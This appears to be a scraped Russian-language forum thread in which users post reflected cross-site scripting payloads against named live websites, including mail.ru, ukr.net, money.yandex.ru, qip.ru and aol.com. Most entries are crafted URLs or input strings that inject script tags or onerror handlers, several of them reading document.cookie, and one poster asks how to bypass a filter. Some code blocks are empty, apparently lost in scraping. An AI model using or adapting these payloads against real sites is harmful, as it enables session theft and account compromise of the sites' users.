![]() |
http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519
|
Код:
http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') /> |
http://maps.mail.ru
В строке поиска: Код:
' onMouseOver='alert(1)'>kards.qip.ru В любых комментариях в login/pass вставляем Код:
"><img src='.' onerror='alert()'> |
http://rabota.mail.ru
Код:
http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba='пффф, уже пофиксили |
money.yandex.ru
https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//-->alert(document.cookie) |
rambler.ru
Вроде ещё не выкладывали. PHP код:
PHP код:
PHP код:
Не знаю выкладывали или нет, гугл не ответил точно. PHP код:
PHP код:
|
mail.ru
Парочка пассивных xss на форумах mail.ru PHP код:
PHP код:
|
Пасcивка на mail.ru
PHP код:
Это можно как-нибудь обойти? |
Цитата:
Код HTML:
http://starlook.lady.mail.ru/commented?period=month">alert(document.cookie) |
Код HTML:
http://help.aol.com/help/microsites/searchEntry.do?&searchString=">alert(document.cookie) |
| Время: 22:04 |